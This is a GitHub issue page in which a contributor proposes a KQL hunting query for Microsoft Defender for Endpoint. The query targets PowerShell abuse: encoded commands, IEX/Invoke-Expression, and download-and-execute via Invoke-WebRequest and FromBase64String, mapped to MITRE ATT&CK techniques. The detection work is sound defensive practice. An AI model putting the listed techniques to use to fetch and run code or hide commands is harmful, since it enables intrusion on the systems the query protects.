Sentinel-Queries icon indicating copy to clipboard operation
Sentinel-Queries copied to clipboard
verified publisher icon reprise99

Add PowerShell abuse detection KQL query for Defender for Endpoint

Open nezercoker opened this issue 6 months ago • 0 comments

Summary

This PR adds a new KQL hunting query that detects suspicious PowerShell activity in Microsoft Defender for Endpoint.

Query Details

Filename: Device-PowerShell-AbuseDetection.kql
Folder: DefenderForEndpoint/
Use case:
The query is designed to identify potentially malicious use of PowerShell involving:

  • Encoded command execution (-enc)
  • Obfuscation (IEX, Invoke-Expression)
  • Download and execution techniques (Invoke-WebRequest, FromBase64String)

MITRE ATT&CK Coverage

  • T1059.001 – PowerShell
  • T1140 – Deobfuscate/Decode Files or Information
  • T1105 – Ingress Tool Transfer

Author

Taiwo Coker (@nezercoker)

Let me know if you'd like this broken out into a JSON metadata file or converted into a GitHub issue template.

nezercoker avatar Jul 06 '25 23:07 nezercoker